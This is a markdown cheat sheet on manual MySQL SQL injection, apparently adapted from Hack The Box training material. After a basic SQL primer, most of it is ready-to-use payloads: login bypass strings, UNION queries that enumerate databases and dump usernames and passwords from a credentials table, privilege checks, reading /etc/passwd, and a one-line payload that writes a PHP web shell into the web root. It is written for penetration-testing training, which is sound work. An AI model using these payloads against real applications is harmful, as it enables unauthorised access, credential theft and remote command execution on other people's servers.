sql-injection.md (4760B)
1 --- 2 title: "SQL Injection Fundamentals" 3 description: "Manual SQL injection: auth bypass, UNION, error/blind, DB fingerprinting and file read/write." 4 category: web 5 tags: [web, sql-injection, injection] 6 tools: [MySQL client] 7 difficulty: intermediate 8 updated: "2026-08-09" 9 source: "repo:HTB/cheatsheet-sql-injection-fundamentals.pdf" 10 --- 11 12 # SQL Injection Fundamentals 13 14 Manual MySQL/MariaDB injection reference: SQL primer, auth bypass, UNION-based extraction, database enumeration, privilege checks, and file read/write. 15 16 ## MySQL Primer 17 18 ### General 19 20 ```sql 21 -- Login to a MySQL database 22 mysql -u root -h docker.hackthebox.eu -P 3306 -p 23 24 -- List available databases 25 SHOW DATABASES; 26 27 -- Switch to a database 28 USE users; 29 ``` 30 31 ### Tables 32 33 ```sql 34 -- Add a new table 35 CREATE TABLE logins (id INT, ...); 36 37 -- List available tables in the current database 38 SHOW TABLES; 39 40 -- Show table properties and columns 41 DESCRIBE logins; 42 43 -- Add values to a table 44 INSERT INTO table_name VALUES (value_1, ...); 45 46 -- Add values to specific columns in a table 47 INSERT INTO table_name(column2, ...) VALUES (column2_value, ...); 48 49 -- Update table values 50 UPDATE table_name SET column1=newvalue1, ... WHERE <condition>; 51 ``` 52 53 ### Querying Data 54 55 ```sql 56 -- Show all columns in a table 57 SELECT * FROM table_name; 58 59 -- Show specific columns 60 SELECT column1, column2 FROM table_name; 61 62 -- Delete a table 63 DROP TABLE logins; 64 65 -- Add a new column 66 ALTER TABLE logins ADD newColumn INT; 67 68 -- Rename a column 69 ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn; 70 71 -- Change a column datatype 72 ALTER TABLE logins MODIFY oldColumn DATE; 73 74 -- Delete a column 75 ALTER TABLE logins DROP oldColumn; 76 ``` 77 78 ### Output Control 79 80 ```sql 81 -- Sort by column 82 SELECT * FROM logins ORDER BY column_1; 83 84 -- Sort by column, descending 85 SELECT * FROM logins ORDER BY column_1 DESC; 86 87 -- Sort by two columns 88 SELECT * FROM logins ORDER BY column_1 DESC, id ASC; 89 90 -- Only show first two results 91 SELECT * FROM logins LIMIT 2; 92 93 -- Only show two results starting from index 1 94 SELECT * FROM logins LIMIT 1, 2; 95 96 -- List results that meet a condition 97 SELECT * FROM table_name WHERE <condition>; 98 99 -- List results where a name is similar to a given string 100 SELECT * FROM logins WHERE username LIKE 'admin%'; 101 ``` 102 103 ## MySQL Operator Precedence 104 105 From highest to lowest: 106 107 1. Division (`/`), Multiplication (`*`), and Modulus (`%`) 108 2. Addition (`+`) and Subtraction (`-`) 109 3. Comparison (`=`, `>`, `<`, `<=`, `>=`, `!=`, `LIKE`) 110 4. NOT (`!`) 111 5. AND (`&&`) 112 6. OR (`||`) 113 114 ## SQL Injection 115 116 ### Auth Bypass 117 118 ```sql 119 -- Basic auth bypass 120 admin' or '1'='1 121 122 -- Basic auth bypass with comments 123 admin')-- - 124 ``` 125 126 ### UNION Injection 127 128 ```sql 129 -- Detect number of columns using ORDER BY 130 ' order by 1-- - 131 132 -- Detect number of columns using UNION injection 133 cn' UNION select 1,2,3-- - 134 135 -- Basic UNION injection 136 cn' UNION select 1,@@version,3,4-- - 137 138 -- UNION injection for 4 columns 139 UNION select username, 2, 3, 4 from passwords-- - 140 ``` 141 142 ### DB Enumeration 143 144 ```sql 145 -- Fingerprint MySQL with query output 146 SELECT @@version 147 148 -- Fingerprint MySQL with no output (time-based) 149 SELECT SLEEP(5) 150 151 -- Current database name 152 cn' UNION select 1,database(),2,3-- - 153 154 -- List all databases 155 cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - 156 157 -- List all tables in a specific database 158 cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - 159 160 -- List all columns in a specific table 161 cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - 162 163 -- Dump data from a table in another database 164 cn' UNION select 1, username, password, 4 from dev.credentials-- - 165 ``` 166 167 ### Privileges 168 169 ```sql 170 -- Find current user 171 cn' UNION SELECT 1, user(), 3, 4-- - 172 173 -- Find if the user has admin privileges 174 cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - 175 176 -- Find all user privileges 177 cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- - 178 179 -- Find which directories can be accessed through MySQL 180 cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - 181 ``` 182 183 ### File Injection 184 185 ```sql 186 -- Read a local file 187 cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - 188 189 -- Write a string to a local file 190 select 'file written successfully!' into outfile '/var/www/html/proof.txt' 191 192 -- Write a web shell into the base web directory 193 cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- - 194 ``` 195 196 > **Note —** `INTO OUTFILE` write access depends on the `secure_file_priv` setting and filesystem permissions of the MySQL service account. `LOAD_FILE` is similarly constrained.